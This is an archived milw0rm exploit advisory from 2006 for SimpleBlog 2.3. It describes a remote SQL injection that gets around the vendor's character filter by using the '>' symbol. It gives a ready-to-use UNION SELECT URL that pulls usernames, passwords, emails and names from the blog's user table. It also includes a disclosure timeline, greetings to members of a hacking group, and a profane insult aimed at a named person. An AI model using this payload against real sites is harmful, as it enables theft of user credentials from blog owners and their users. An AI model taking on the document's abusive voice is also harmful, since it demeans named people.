_ _
__ _(_)_ __ ___| |_ __ _
\ \ / / | '_ \/ __| __/ _` |
\ V /| | |_) \__ \ || (_| |
\_/ |_| .__/|___/\__\__,_|
|_| AnD
_ _ _ _ _
_ __ ___ _ _ _ __ __| | ___ _ __ ___| | _(_) | |____
| '_ ` _ \| | | | '__/ _` |/ _ \ '__/ __| |/ / | | |_ /
| | | | | | |_| | | | (_| | __/ | \__ \ <| | | |/ /
|_| |_| |_|\__,_|_| \__,_|\___|_| |___/_|\_\_|_|_/___|
+-----------------------------------------------------------------+
| Vipsta & MurderSkillz fucking pwnt this webApp |
+-----------------------------------------------------------------+
| App Name: SimpleBlog 2.3 |
| App Author: 8pixel.net |
| App Version: <= 2.3 |
| App Type: Blog/Journal |
+-----------------------------------------------------------------+
| DETAILS |
+-----------------------------------------------------------------+
| Vulnerability: Remote SQL Injection |
| Requirements: Database with UNION support |
| Revisions: Note - This is a revision of another vuln |
| posted by Chironex Fleckeri |
+-----------------------------------------------------------------+
| CODE |
+-----------------------------------------------------------------+
| Vendor "implemented" a fix for SQL injection vulnerabilities. |
| however this bullshit was easily worked around by |
| Vipsta & MurderSkillz. |
| |
| Vendor attempted to remove illegal characters like ' and = |
| which stop most SQL injection vulnerabilities. However: |
| Vendor failed to remove '>' symbol. |
+-----------------------------------------------------------------+
| EXPLOIT |
+-----------------------------------------------------------------+
| SQL Injection String: |
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1 |
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| TIMELINE |
+-----------------------------------------------------------------+
| 9/2/06 - Vendor Notified. |
| 9/2/06 - Vendor Replied. Threatens legal action. |
| 9/4/06 - Exploit Released with no details to vendor. |
+-----------------------------------------------------------------+
| SHOUTZ |
+-----------------------------------------------------------------+
| Everyone at g00ns.net - including: |
| z3r0, spic, arya (aka nex, aka Lythex), FuRy, Mayo, |
| TrinTITTY, 0ptix, scuzz, overdose, Cre@mpuff, Riot, |
| JuNk, CeLe, LaD, NightSins, Zodiac, grumpy, FiSh, pr0be, |
| ReysRaged, milf <3, gio, RedCoat, and all who I forgot! |
+-----------------------------------------------------------------+
| ADDITIONAL NOTES |
+-----------------------------------------------------------------+
| TeamSpeak: ts.g00ns.net |
| IRC: irc.g00ns.net |
+-----------------------------------------------------------------+
| PERSONAL STUFF |
+-----------------------------------------------------------------+
| Sess from g00ns.net IS A FUCKING MORON. |
+-----------------------------------------------------------------+
__
___ ___ / _|
/ _ \/ _ \| |_
| __/ (_) | _|
\___|\___/|_|.
# milw0rm.com [2006-09-04]
